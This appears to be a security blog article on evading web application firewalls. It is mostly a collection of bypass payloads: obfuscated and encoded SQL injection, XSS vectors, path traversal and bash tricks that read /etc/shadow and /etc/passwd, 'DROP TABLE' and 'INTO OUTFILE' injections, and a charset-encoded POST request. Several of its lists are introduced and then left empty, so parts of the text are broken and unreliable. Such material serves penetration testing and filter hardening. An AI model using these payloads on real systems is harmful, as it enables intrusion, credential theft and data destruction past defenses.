The term web application firewall (WAF) refers to a set of monitoring tools and filters designed to detect and block network attacks against a specific web application. According to pentesting experts at the International Institute of Cyber Security (IICS), these are security tools that, in real time, decide whether to allow or deny access to an online deployment.
Like any other security solution, a WAF is only a complementary solution for a comprehensive security environment, so it must be implemented along with other elements such as incident monitoring tools or anti-fraud systems.
A pentesting process against a WAF allows researchers to determine the real IP address of the target and, at later stages, try to evade this protection mechanism. The WAF compromise allows researchers (and also hackers) to know what’s behind these implementations.
Pentesting experts consider that nearly 50% of WAF implementations are vulnerable to one or more evasion methods, as hackers have made great strides in attack variants to these solutions, primarily by delivering malicious payloads disguised as legitimate software.
On this occasion, we will show you some techniques and tools to analyze a WAF and evade these security measures. As usual we remind you that this article was prepared for informational purposes only, so IICS is not responsible for the misuse that may be given to the information contained herein.
There is a general process for finding the actual IP of a target website:
To check if a WAF is configured correctly, pentesting experts recommend relying on the following indicators:
To verify the proper configuration of these devices, experts can:
Most hackers use automated tools to speed up web application firewall evasion processes. Below is a small list of the most popular tools for these activities; its use is only the first step in verifying how much information an attacker will be able to access.
There are many other tools, but pentesting experts claim that these are the most popular.
Below we will review some of the best known WAF bypassing techniques.
It consists of the combination of uppercase and lowercase characters.
Basic request payload:
SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'
sELeCt *fRoM*wHerE OWNER='NAME_OF_DB'
http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4
Pentesting experts can also modify a normal payload with %encoding/ URL. For this technique you can use Burp Suite, which has a built-in coding and decoding tool.
%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F
UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)
UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29
https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT
ASCII characters provide us with excellent solutions to evade a WAF. Encode the entire payload or just one fragment for satisfactory results.
/?redir=http://google.com
/?redir=http://google。 com (Unicode)
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow
According to pentesting experts, web applications encode special characters in HTML; encoding and rendering, respectively basic cross-sectional cases with numeric and general HTML encoding.
"><img src=x onerror=confirm()>
These rules tend to filter a particular type of encoding. These filters can be omitted using the combined encoding payload, using new lines and tabs and increased obfuscation.
Sometimes hackers often hide standard payload vectors in code comments, pentesting experts mention. Different payloads have different obfuscation methods.
/?id=1+un/**/ion+sel/**/ect+1,2-
Attackers can also insert comments in the middle of the lines of attack. For example, / *! SELECT * / can be ignored by the WAF implementation, but passed to the target application and processed by the MySQL database.
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#
index.php?page_id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3
WAF filters typically encode characters to protect a web application. Poorly designed filters can be evaded with relative ease using double coding, say pentesting experts.
%253Cscript%253Econfirm()%253C%252Fscript%253E
Several command-line utilities use templates to work with multiple files globally. We can change these templates to run system commands.
Programming languages have different templates and syntax for concatenation. According to pentesting experts, this allows you to create payloads that can evade various filters and rules.
/bi'n'''/c''at' /e'tc'/sh''ad'ow
Bash allows the concatenation of paths for execution.
These are simple payloads easily filtered by WAF. In some cases, adding some unwanted characters helps avoid detection, allowing pentesting experts to obfuscat regular expression firewalls.
Much regular expression filtering WAF effectively blocks multiple attempts. The line break technique (CR and LF) can break the firewall’s regular expression to bypass security measures.
Regular expression filters can be omitted by using uninitialized bash variables. This value is zero and acts as empty strings. Bash and Perl allow such interpretations.
$u/bin$u/cat$u $u/etc$u/shadow$u
$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
Tabs are often used to bypass firewalls, especially those based on regular expressions. Tabs can help break a WAF regular expression when the regular expression expects spaces instead of tabs.
http://test.com/test?id=1 union select 1,2,3
Token attacks are based on trying to break the logic of splitting a request into tokens using means of token protection, pentesting experts say. Token breakers are tokens that allow you to influence the correspondence between a string element and a specific token. Our request must remain valid when using token crackers.
?id='-sqlite_version() UNION SELECT passwords FROM users -
Example: unknown context for the pentester.
?id=12);D ROP TABLE users -
?id=133) INTO OUTFILE 'xxx' -
Many web applications support different types of encoding and can interpret it. We will always need to obfuscat the payload in a non-WAF-compliant format, but the server can forward our payload.
IIS 6, 7.5, 8, and 10 can be interpreted as IBM037.
Send parameters encoded with:
POST /example.aspx?id7=sometext HTTP/1.1 HOST: target.org Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 27 id2='union all select * from users-POST /example.aspx?%89%84%F7=%A2%95%94%86%A3%88%89%95%87 HTTP/1.1 HOST: target.org Content-Type: application/x-www-form-urlencoded; charset=ibm037 Content-Length: 127 %89%84%F2=%7D%A4%95%89%97%95%40%81%93%94%40%A2%85%93%85%84%A3%40%5C%40%86%99
Finally, pentesting experts have a number of useful tips during these safety tests:
For further reports on vulnerabilities, pentesting, exploits, malware variants, cybersecurity risks and information security courses fell free to visit the International Institute of Cyber Security (IICS) websites, as well as the official platforms of technology companies.